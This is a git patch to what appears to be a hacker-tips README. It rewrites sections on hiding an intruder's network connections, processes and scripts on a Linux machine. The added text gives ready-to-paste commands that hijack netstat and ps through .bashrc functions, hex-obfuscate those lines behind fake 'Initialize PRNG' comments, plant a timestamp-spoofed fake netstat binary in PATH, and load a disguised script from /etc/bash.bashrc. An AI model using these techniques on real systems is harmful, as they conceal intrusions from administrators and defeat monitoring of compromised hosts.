From 2c034937252cb5b3d6a1cfb90b3ad407a99958b5 Mon Sep 17 00:00:00 2001
From: SkyperTHC <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 3 Sep 2022 13:00:57 +0100
Subject: [PATCH] Update README.md
---
README.md | 90 +++++++++++++++++++++++++++++++++++--------------------
1 file changed, 58 insertions(+), 32 deletions(-)
diff --git a/README.md b/README.md
index 05324ae..0179cc8 100644
--- a/README.md
+++ b/README.md
@@ -10,8 +10,10 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Leave Bash without history](#lbwh-anchor)
1. [Hide your command](#hyc-anchor)
1. [Hide your arguments](#hya-anchor)
- 1. [Hide a process](#hide-a-process)
1. [Hide a network connection](#hide-a-connection)
+ 1. [Hide a process as user](#hide-a-process-user)
+ 1. [Hide a process as root](#hide-a-process-root)
+ 1. [Hide scripts](#hide-scripts)
1. [SSH](#ais-anchor)
1. [Almost invisible SSH](#ais-anchor)
1. [SSH tunnel OUT](#sto-anchor)
@@ -95,6 +97,7 @@ Any command starting with a " " (space) will [not get logged to history](https:/
```
$ id
```
+
**1.ii. Hide your command**
@@ -125,8 +128,52 @@ LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24
```
Note: There is a gdb variant as well. Anyone?
-
-**1.iv. Hide a process**
+
+**1.iv. Hide a Network Connection**
+
+The trick is to hijack `netstat` and use grep to filter out our connection. This example filters any connection on port 31337 _or_ ip 1.2.3.4. The same should be done for `ss` (a netstat alternative).
+
+**Method 1 - Hiding a connection with bash-function in ~/.bashrc**
+
+Cut & paste this to add the line to ~/.bashrc
+```shell
+echo 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }' >>~/.bashrc
+```
+
+Or cut & paste this for an obfuscated entry to ~/.bashrc:
+```shell
+X='netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }'
+echo "eval \$(echo $(echo "$X" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG" >>~/.bashrc
+```
+
+The obfuscated entry to ~/.bashrc will look like this:
+```
+eval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG
+```
+
+**Method 2 - Hiding a connection with a binary in $PATH**
+
+Hide a fake netstat binary in /usr/local/sbin whereas the real netstat is in /usr/bin. On a default Debian (and most Linux) the PATH variables (`echo $PATH`) lists /usr/local/sbin _before_ /usr/bin. This means that our hijacking binary /usr/local/sbin/netstat will be executed instead of /usr/bin/netstat.
+
+```shell
+echo -e "#! /bin/bash
+exec /usr/bin/netstat \"\$@\" | grep -Fv -e :22 -e 1.2.3.4" >/usr/local/sbin/netstat \
+&& chmod 755 /usr/local/sbin/netstat \
+&& touch -r /usr/bin/netstat /usr/local/sbin/netstat
+```
+
+*(thank you iamaskid)*
+
+
+
+Continuing from "Hiding a connection" the same technique can be used to hide a process. This example hides the nmap process:
+
+```shell
+echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap -e GREP; }' >>~/.bashrc
+```
+
+
+**1.vi. Hide a process as root**
This requires root privileges and is an old Linux trick by over-mounting /proc/<pid> with a useless directory:
```sh
@@ -152,41 +199,20 @@ hide nohup sleep 1234 &>/dev/null & # Starts and hides 'sleep 1234' as a backgr
(thanks to *druichi* for improving this)
-
-**1.v. Hide a Network Connection**
+
+**1.vii. Hide shell scripts**
-The trick is to hijack `netstat` and use grep to filter out our connection. This example filters any connection on port 31337 _or_ ip 1.2.3.4. The same should be done for `ss` (a netstat alternative).
+Above we discussed how to obfuscate a line in ~/.bashrc. An often used trick is to use `source` instead. It is little known that the source command works can she shortened to `.` (yes, a dot) _and_ searches through the PATH variable to find the file to load.
-**Method 1 - Hijacking with bash-function in ~/.bashrc**
-
-Cut & paste this to add the line to ~/.bashrc
-```shell
-echo 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }' >>~/.bashrc
-```
-
-Or cut & paste this for an obfuscated entry to ~/.bashrc:
-```shell
-X='netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }'
-echo "eval \$(echo $(echo "$X" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG" >>~/.bashrc
-```
-
-The obfuscated entry to ~/.bashrc will look like this:
-```
-eval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG
-```
-
-**Method 2 - Hijacking with a binary in $PATH**
-
-Hide a hijacking binary in /usr/local/sbin whereas the real netstat is in /usr/bin. On a default Debian (and most Linux) the PATH variables (`echo $PATH`) lists /usr/local/sbin _before_ /usr/bin. This means that the hijacking binary (netstat) will be executed instead of /usr/bin/netstat.
+In this example our script ```prng``` contains our shell functions to hide our network connection and nmap process. Last we add `. prng` into the user's .bashrc file to load our function on login:
```shell
-echo -e "#! /bin/bash
-exec /usr/bin/netstat \"\$@\" | grep -Fv -e :22 -e 1.2.3.4" >/usr/local/sbin/netstat \
-&& chmod 755 /usr/local/sbin/netstat \
-&& touch -r /usr/bin/netstat /usr/local/sbin/netstat
+echo -e "netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }
+ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap -e GREP; }" >/usr/bin/prng \
+&& echo ". prng #Initialize Pseudo Random Number Generator" >>/etc/bash.bashrc
```
-*(thank you iamaskid)*
+(The same works for `lsof`, `ss` and `ls`)
---